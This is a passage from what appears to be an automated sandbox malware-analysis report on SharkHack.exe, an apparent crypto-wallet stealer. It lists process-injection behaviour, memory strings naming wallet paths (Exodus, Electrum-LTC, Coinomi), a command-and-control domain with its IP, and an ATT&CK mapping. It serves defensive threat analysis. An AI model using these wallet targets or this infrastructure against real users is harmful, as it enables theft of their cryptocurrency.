Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7012, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2875564569.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx LibertyMP
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/BinancX
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
Source: Yara match | File source: 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7012, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7012, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2875564569.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE
MITRE ATT&CK Matrix (cells prefixed with a number are techniques matched by that many signatures; all other cells are unmatched matrix entries)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Scheduled Task/Job | 1 Valid Accounts | 1 Valid Accounts | 1 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | 1 Scheduled Task/Job | 1 Access Token Manipulation | 1 Valid Accounts | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 311 Process Injection | 1 Access Token Manipulation | Security Account Manager | 141 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Scheduled Task/Job | 1 Disable or Modify Tools | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 2 Clipboard Data | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 141 Virtualization/Sandbox Evasion | LSA Secrets | 22 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Deobfuscate/Decode Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 3 Obfuscated Files or Information | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Software Packing | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 DLL Side-Loading | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1582497 | Sample: SharkHack.exe | Start date: 30/12/2024 | Architecture: WINDOWS | Score: 100

Behavior graph (node and edge data recovered from the graph rendering):

• Start: contacts aliveindu.click; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Antivirus / Scanner detection for submitted sample, 10 other signatures; started SharkHack.exe
• SharkHack.exe: dropped C:\Users\user\AppData\...\SharkHack.exe.log (ASCII); signatures: Found many strings related to Crypto-Wallets (likely being stolen), Writes to foreign memory regions, Allocates memory in foreign processes, 4 other signatures; started InstallUtil.exe (four instances)
• InstallUtil.exe: signatures: Writes to foreign memory regions, Allocates memory in foreign processes, Hides that the sample has been downloaded from the Internet (zone.identifier), 2 other signatures; started AddInProcess32.exe; a second InstallUtil.exe instance started WerFault.exe
• AddInProcess32.exe: contacts aliveindu.click (104.21.64.143, port 443, local ports 50013 and 50014; CLOUDFLARENETUS, United States); signature: Found many strings related to Crypto-Wallets (likely being stolen)

Source | Detection | Scanner | Label | Link
SharkHack.exe | 100% | Avira | HEUR/AGEN.1314429 |
SharkHack.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://aliveindu.click/ | 0% | Avira URL Cloud | safe |
https://aliveindu.click/6( | 0% | Avira URL Cloud | safe |
https://aliveindu.click:443/api | 0% | Avira URL Cloud | safe |
https://aliveindu.click/api | 0% | Avira URL Cloud | safe |
aliveindu.click | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
aliveindu.click | 104.21.64.143 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
https://aliveindu.click/api | true | Avira URL Cloud: safe | unknown
nearycrepso.shop | false | | high
aliveindu.click | true | Avira URL Cloud: safe | unknown
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.quotable.io/random?tags=love | SharkHack.exe | false | | high
http://www.tiro.com | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.carterandcone.coml | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sajatypeworks.com | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aliveindu.click/ | AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.2925272325.0000000001464000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/frere-user.html | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers8 | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aliveindu.click/6( | AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aliveindu.click:443/api | AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.64.143 | aliveindu.click | United States | 13335 | CLOUDFLARENETUS | true
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1582497
                                                                                                      Start date and time:2024-12-30 18:44:06 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 13s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
